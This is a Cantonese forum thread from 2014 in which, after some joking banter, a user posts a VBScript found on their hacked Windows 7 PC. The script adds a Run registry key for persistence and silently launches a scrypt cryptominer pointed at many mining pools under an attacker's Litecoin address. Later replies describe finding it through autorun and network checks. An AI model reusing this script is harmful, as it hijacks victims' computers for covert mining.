返回列表 回復 發帖
早抖咁早?
chan200308 發表於 10/4/2014 05:51 PM
好似你係咪你40年前失散咗既細佬
認真睇真啲真係又真係
應該40年前失散咗既狗仔..........
chan200308 發表於 10/4/2014 05:57 PM
咁你咪係大狗仔
認真睇真啲真係又真係
唔係40年前失蹤隻小強咩
siuland 發表於 10/4/2014 05:59 PM
如果係就係六千萬年前失踪咗既小強啦
認真睇真啲真係又真係
40年前............我殺咗好多小強
chan200308 發表於 10/4/2014 06:01 PM
40年嚟你養咗好多小強
認真睇真啲真係又真係
梗大啦
chan200308 發表於 10/4/2014 06:02 PM
大狗仔乖...
認真睇真啲真係又真係
我派弟子咁有先見, 知道將來有清朝喎。
pknoface 發表於 10/4/2014 07:12 PM
亂up都會up中
認真睇真啲真係又真係
幹!!!
俾人入咗後門



const HKEY_CURRENT_USER = &H80000001
strComputer = "."
Set objReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\"&_
    strComputer & "\root\default:StdRegProv")

strKeyPath = "Software\Microsoft\Windows\CurrentVersion\Run\"
KeyPath = "Software\Microsoft\Windows\CurrentVersion\Run"
strValueName = "Network"
strValue = "C:\Drivers\network\sc.lnk"


' Create key to use
Return = objReg.CreateKey(HKEY_CURRENT_USER, KeyPath)



' write string value to key   
Return = objReg.SetStringValue( _
        HKEY_CURRENT_USER,strKeyPath,strValueName,strValue)

Set objFSO = CreateObject("Scripting.FileSystemObject")


If objFSO.FileExists("C:\Drivers\network\prowin64.exe") Then
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run "prowin64 -S opencl:auto --scrypt -o stratum+tcp://multi2.wemineall.com:80 -u darkmatrix.file -p update -o stratum+tcp://multi1.wemineall.com:80 -u darkmatrix.file -p update -o stratum+tcp://hk.wemineltc.com:80 -u darkmatrix.file -p update -o stratum+tcp://usa.wemineltc.com:80 -u darkmatrix.file -p update -o stratum+tcp://freedom.wemineltc.com:80 -u darkmatrix.file -p update -o stratum+tcp://litecoin.tw:9327 -u Lh1tA61DEfQBjTFhLmtysz71r5bbgzgntD -p update -o stratum+tcp://lc.mine.bz:80 -u Lh1tA61DEfQBjTFhLmtysz71r5bbgzgntD -p update -o stratum+tcp://elitter.net:9327 -u Lh1tA61DEfQBjTFhLmtysz71r5bbgzgntD -p update -o stratum+tcp://sleipnir.syari.net:9327 -u Lh1tA61DEfQBjTFhLmtysz71r5bbgzgntD -p update -o stratum+tcp://mint.crabdance.com:9327 -u Lh1tA61DEfQBjTFhLmtysz71r5bbgzgntD -p update -o stratum+tcp://q30.qhor.net:9327 -u Lh1tA61DEfQBjTFhLmtysz71r5bbgzgntD -p update -o stratum+tcp://coinp2pool.com:9327 -u Lh1tA61DEfQBjTFhLmtysz71r5bbgzgntD -p update -o stratum+tcp://pool.dlunch.net:9327 -u Lh1tA61DEfQBjTFhLmtysz71r5bbgzgntD -p update --intensity=13", 0, True   
Else
   Wscript.Quit
End If
認真睇真啲真係又真係
不明白!!!
lovebearhl 發表於 11/4/2014 06:02 PM
俾黑客放咗指令開網絡後門
既係話佢可以由我網絡發出指令去Hack人哋
認真睇真啲真係又真係
XP?
BeiDouChef 發表於 11/4/2014 06:09 PM
Win7
認真睇真啲真係又真係
通常要怎樣才知道被HACK?
BeiDouChef 發表於 11/4/2014 06:16 PM
check network connection activity, 睇邊個port有唔尋常啲網絡流通
認真睇真啲真係又真係
本帖最後由 lckiong 於 2014-4-11 06:22 PM 編輯

仲有睇registery有冇一開機就行啲不知所謂既文件(黑客會將exe指令偽裝成其他文件)

我就係睇到E個sc.lnk先發現連去config.vbs



strKeyPath = "Software\Microsoft\Windows\CurrentVersion\Run\"
KeyPath = "Software\Microsoft\Windows\CurrentVersion\Run"
strValueName = "Network"
strValue = "C:\Drivers\network\sc.lnk"
認真睇真啲真係又真係
竟然用我電腦去掘bitcoin
認真睇真啲真係又真係
各位早抖咯。
pknoface 發表於 12/4/2014 12:47 AM
掌門多啲蛇王嚟睇館咯~
認真睇真啲真係又真係
有游戏
lovebearhl 發表於 13/4/2014 09:06 PM
玩亂估遊戲
認真睇真啲真係又真係
返回列表